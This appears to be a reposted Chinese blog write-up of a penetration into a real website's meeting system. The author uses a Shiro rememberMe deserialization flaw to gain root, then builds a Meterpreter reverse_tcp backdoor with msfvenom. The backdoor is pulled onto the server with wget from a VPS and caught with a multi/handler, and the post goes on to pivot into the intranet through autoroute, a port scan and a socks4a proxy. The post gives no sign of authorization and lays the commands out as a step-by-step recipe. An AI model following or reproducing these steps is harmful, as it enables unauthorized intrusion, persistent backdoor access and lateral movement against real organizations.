实战|某网站shiro反序列化漏洞的渗透过程
2022-11-11 00:2:0 Author: 橘猫学安全(查看原文) 阅读量:51 收藏

前期打点,开始的想法是爆破个弱口令的,弱口令爆破一圈没有找到有用的账户,

返回包存在 :Set-Cookie: rememberMe=deleteMe; 参数, 测试一下 shiro漏洞,万一没修复就捡到了,美滋滋

成功打到DNSLOG 返回信息

得到log,确定漏洞是存在的,脚本写入linux反弹shell的命令,

vps 开启NC 监听  nc -lvp 777 成功返回

获得服务器权限 root ,开始通过dnslog 知道服务器是通外网的,利用msf 生成  elf 后门

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=IP LPORT=端口 -f elf > 123.elf

把生成好的后门放在远程HTTP服务上面,

在shell里,wget 远程下载

成功下载以后,chmod 给后门权限 777 就行,-rwxrwxrwx 1 root root

msf 运行命令  use exploit/multi/handler   获得shell反弹地址

set payload linux/x64/meterpreter/reverse_tcp

地址填写VPS  端口写后门端口就好了,直接run

查看内网路由,添加路由命令

run get_local_subnets //获取路由地址run autoroute -s xxx.xxx.xxx.xxx/24 //添加路由run autoroute -p //查看添加的路由run autorouute -d //删除添加的路由

内网扫描端口  use auxiliary/scanner/portscan/tcp 

利用msf socks4a模块代理

use auxiliary/server/socks4a set SRVHOST IPset SRVPORT 端口

运行返回信息:

msf5 auxiliary(server/socks4a) > run[*] Auxiliary module running as background job 0.[*] Starting the socks4a proxy server

本地利用代理连接 代理的服务器 设置好端口 ,浏览器访问

某会议系统

作者:时光与她Time链接:https://www.jianshu.com/p/43623c4daa3

如有侵权,请联系删除

推荐阅读

实战|记一次奇妙的文件上传getshell
「 超详细 | 分享 」手把手教你如何进行内网渗透
神兵利器 | siusiu-渗透工具管理套件
一款功能全面的XSS扫描器
实战 | 一次利用哥斯拉马绕过宝塔waf
BurpCrypto: 万能网站密码爆破测试工具
快速筛选真实IP并整理为C段 -- 棱眼
自动探测端口顺便爆破工具t14m4t
渗透工具|无状态子域名爆破工具(1秒扫160万个子域)
查看更多精彩内容,还请关注橘猫学安全:
每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“再看

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247500427&idx=1&sn=ad15c43d3fa3aeb70bce5c0c3144ffac&chksm=c04d45b5f73acca368200443c65d7d49b71aa4f771fe7c8bd8c9e2230e88843c739237a24734#rd
如有侵权请联系:admin#unsafe.sh